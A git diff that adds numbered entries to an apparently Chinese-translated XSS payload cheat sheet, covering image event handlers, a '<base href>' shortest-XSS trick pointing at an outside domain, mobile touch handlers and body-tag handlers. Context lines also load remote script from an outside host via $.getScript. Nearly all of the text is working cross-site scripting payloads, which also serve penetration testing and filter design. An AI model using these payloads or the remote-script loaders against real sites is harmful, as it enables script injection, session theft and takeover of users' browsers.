@@ -677,6 +677,44 @@ $input = preg_replace("/:|\\\/", "", htmlentities($input, ENT_QUOTES))
677
677
onload=function(){$.getScript('//brutelogic.com.br/2.js')}
678
678
onload=x=>$.getScript('//brutelogic.com.br/2.js')
679
679
```
680
+ ** 90.Image Vectors - Alternative Event Handlers (图像向量-可选事件处理程序)** <br >
681
+ 以下payload用于触发事件处理程序,不同于onerror事件。 <br >
682
+ ```
683
+ <img
684
+ <image
685
+ src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=
686
+ srcset=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=
687
+ onload=alert(1)>
688
+ onloadend=alert(1)>
689
+ onloadstart=alert(1)>
690
+ ```
691
+ ** 91.Shortest XSS (最短XSS)** <br >
692
+ 当有一个有限xss漏洞利用点时。需要一个javascript脚本调用,通过相对路径放在xss需要加载的位置之后。攻击者服务器必须使用攻击脚本对本机脚本(相同路径)或默认404页(更容易)内完成的确切请求进行响应。域名越短越好。 <br >
693
+
694
+ ```
695
+ <base href=//knoxss.me>
696
+ ```
697
+ ** 92.Mobile-only Event Handlers (仅处理移动端应用)** <br >
698
+ 以下payload,针对移动应用程序时使用。<br >
699
+
700
+ ```
701
+ <html ontouchstart=alert(1)>
702
+ <html ontouchend=alert(1)>
703
+ <html ontouchmove=alert(1)>
704
+ <body onorientationchange=alert(1)>
705
+ ```
706
+ ** 93.Body Tag (body 标签)** <br >
707
+ body标签的集合。最后一个只适用于Internet Explorer浏览器。<br >
708
+ ```
709
+ <body onload=alert(1)>
710
+ <body onpageshow=alert(1)>
711
+ <body onfocus=alert(1)>
712
+ <body onhashchange=alert(1)><meta content=URL;%23 http-equiv=refresh>
713
+ <body onscroll=alert(1) style=overflow:auto;height:1000px id=x>#x
714
+ <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><x id=x>#x
715
+ <body onresize=alert(1)>press F12!
716
+ <body onhelp=alert(1)>press F1!
717
+ ```
680
718
681
719
## 致谢
682
720
** 英文议题作者:** <br >
0 commit comments